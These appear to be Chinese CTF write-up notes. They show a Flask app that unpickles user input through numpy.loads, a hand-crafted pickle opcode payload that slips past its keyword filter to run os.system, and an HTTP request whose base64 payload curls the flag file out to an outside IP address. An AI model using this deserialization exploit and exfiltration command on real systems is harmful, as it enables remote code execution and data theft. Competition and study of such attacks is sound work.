import numpy, base64
from flask import Flask, Response, request
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return '小p想要找一个女朋友,你能帮他找找看么?'
@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
if request.values.get('data'):
data = request.values.get('data')
numpydata = base64.b64decode(data)
if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
return '不能走捷径啊'
resp = numpy.loads(numpydata)
return '可以的,要的就是一种感觉'
return '有进步了,但是不多'
@app.route('/download', methods=['GET', 'POST'])
def download():
with open('www.zip', 'rb') as (f):
stream = f.read()
response = Response(stream, content_type='application/octet-stream')
response.headers['Content-disposition'] = 'attachment;filename=www.zip'
return response
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
# okay decompiling .app.cpython-38.pyc
phpstudy漏洞修改admin密码
勾选系统权限,查看文件并下载flag
2
easypy
扫目录,有download路由,下载源码
import numpy, base64
from flask import Flask, Response, request
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return '小p想要找一个女朋友,你能帮他找找看么?'
@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
if request.values.get('data'):
data = request.values.get('data')
numpydata = base64.b64decode(data)
if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
return '不能走捷径啊'
resp = numpy.loads(numpydata)
return '可以的,要的就是一种感觉'
return '有进步了,但是不多'
@app.route('/download', methods=['GET', 'POST'])
def download():
with open('www.zip', 'rb') as (f):
stream = f.read()
response = Response(stream, content_type='application/octet-stream')
response.headers['Content-disposition'] = 'attachment;filename=www.zip'
return response
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
# okay decompiling .app.cpython-38.pyc
过滤了r和反弹shell直接外带
import numpy
import pickle
import base64
import os
opcode=b'''c__builtin__
map
p0
0(S'curl xxx:5555/`cat /flag`'
tp1
0(cos
system
g1
tp2
0g0
g2
x81p3
0c__builtin__
tuple
p4
(g3
tx81.'''
code=base64.b64encode(opcode)
print(code)
# pickle.loads(base64.b64decode(code))
numpydata = base64.b64decode(code)
if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
print('不能走捷径啊')
else:
resp = numpy.loads(numpydata)
print("ok")
POST /girlfriends HTTP/1.1Host: eci-2ze5mdaorvazf0lpit4y.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
data=Y19fYnVpbHRpbl9fCm1hcApwMAowKFMnY3VybCAxMjQuNzAuMjA2LjIzODo1NTU1L2BjYXQgL2ZsYWdgJwp0cDEKMChjb3MKc3lzdGVtCmcxCnRwMgowZzAKZzIKgXAzCjBjX19idWlsdGluX18KdHVwbGUKcDQKKGczCnSBLg==